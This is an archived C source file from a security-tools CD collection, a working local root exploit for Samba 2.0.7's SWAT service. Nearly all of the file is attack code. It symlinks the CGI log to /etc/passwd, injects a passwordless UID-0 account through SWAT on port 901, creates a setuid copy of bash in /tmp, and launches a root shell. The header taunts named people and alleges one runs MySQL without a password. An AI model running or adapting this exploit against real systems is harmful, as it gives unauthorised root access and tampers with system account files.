home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / swat-exp.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.9 KB  |  81 lines
  1. /****************************************************************************\
  2. **                                                                          **
  3. **   Swat exploit for Samba 2.0.7 compiled with the cgi logging turned on   **
  4. **                                                                          **
  5. **   shell script version available for our friends, the self-proclaimed    **
  6. **   security experts at corky.net (h4h32h4h4h4h4), using netcat, as they   **
  7. **   deem more elegant than a self-contained exploit (ala this .c), l4m3    **
  8. **   exploit by optyx <optyx@uberhax0r.net>                                 **
  9. **   vulnerability discoverd by miah <miah@uberhax0r.net>                   **
  10. **                                                                          **
  11. **   on a side note, Just Marc rocks, so much, he doesn't set an sa pass    **
  12. **   on his mysql server (doesn't take an elite hacker to use mysqlclient)  **
  13. **   oh and a special message:                                              **
  14. **   Hey babe, your hair's alright Hey babe, let's go out tonight (h4h4h)   **
  15. **                                                                          **
  16. \****************************************************************************/                  
  17. #include <stdio.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20.  
  21. #define REALLY_FUCKING_LONG_COMMAND "su uberhaxr -c \"cp -pdf /tmp/.bak \
  22. /etc/passwd; chown root.root /etc/passwd; touch -fr /tmp/.bak /etc/passwd\""
  23.  
  24. int main(void) {
  25.  
  26.    int r, s;
  27.    struct sockaddr_in s_addr;
  28.    
  29.    printf("backing up /etc/passwd\n");
  30.    system("cp -pd /etc/passwd /tmp/.bak");
  31.    system("touch -r /etc/passwd /tmp/.bak");
  32.  
  33.    if(system("/bin/ln -sf /etc/passwd /tmp/cgi.log") > 0) {
  34.       printf("error, /tmp/cgi.log could not be linked to /etc/passwd\n");
  35.       unlink("/tmp/.bak");
  36.       exit(-1);
  37.    }
  38.  
  39.    printf("connecting to swat\n");
  40.    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  41.  
  42.    if(s < 0) {
  43.       printf("error, could not create socket\n");
  44.       unlink("/tmp/.bak");
  45.       unlink("/tmp/cgi.log");
  46.       exit(-1);
  47.    }
  48.  
  49.    s_addr.sin_family = PF_INET;
  50.    s_addr.sin_port = htons(901);
  51.    s_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
  52.    r = connect(s, (struct sockaddr *) &s_addr, sizeof(s_addr));
  53.  
  54.    if(r==-1) {
  55.       printf("error, cannot connect to swat\n");
  56.       unlink("/tmp/.bak");
  57.       unlink("/tmp/cgi.log");
  58.       exit(-1);
  59.    }
  60.  
  61.    send(s, "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n", 1024, 0);
  62.    close(s);
  63.  
  64.    if(system("su -l uberhaxr -c \"cp -f /bin/bash /tmp/.swat\"") > 0) {
  65.       printf("exploit failed\n");
  66.       unlink("/tmp/.bak");
  67.       unlink("/tmp/cgi.log");
  68.       exit(-1);
  69.    }
  70.  
  71.    system("su -l uberhaxr -c \"chmod u+s /tmp/.swat\"");
  72.    printf("restoring /etc/passwd\n");   
  73.    system(REALLY_FUCKING_LONG_COMMAND);
  74.    unlink("/tmp/.bak");
  75.    unlink("/tmp/cgi.log");
  76.    printf("got root? (might want to rm /tmp/.swat)\n");
  77.    system("/tmp/.swat"); 
  78.      
  79.    return 0; 
  80. }
  81.